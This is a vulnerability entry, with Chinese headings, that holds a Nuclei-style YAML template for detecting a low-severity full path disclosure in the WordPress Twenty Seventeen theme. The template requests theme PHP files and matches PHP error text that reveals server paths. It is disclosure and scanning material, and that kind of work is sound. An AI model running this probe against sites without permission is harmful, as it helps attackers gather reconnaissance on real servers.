漏洞描述
WordPress Twenty Seventeen theme files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
wp-twenty-theme-fpd: WordPress Twenty Seventeen - Full Path Disclosure
PoC代码[已公开]
id: wp-twenty-theme-fpd
info:
name: WordPress Twenty Seventeen - Full Path Disclosure
author: DhiyaneshDk
severity: low
description: |
WordPress Twenty Seventeen theme files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
reference:
- https://wordpress.org/themes/twentyseventeen/
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/themes/twentyseventeen/"
tags: debug,wordpress,fpd,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/twentyseventeen/inc/template-tags.php"
- "{{BaseURL}}/wp-content/themes/twentyseventeen/inc/"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "/themes/twentyseventeen/")'
- 'contains_all(body, "Fatal error", "Call to undefined function")'
condition: and
# digest: 490a00463044022025f813d046a7d73d86c8e0f23968c9facf91c7443e09f16b8da0cb737aa9ec8a022000ed0a4a0cb26f5d4d4fe3e915736d0d65a99defac1e897484cf6f88303d34a3:922c64590222798bb761d5b6d8e72950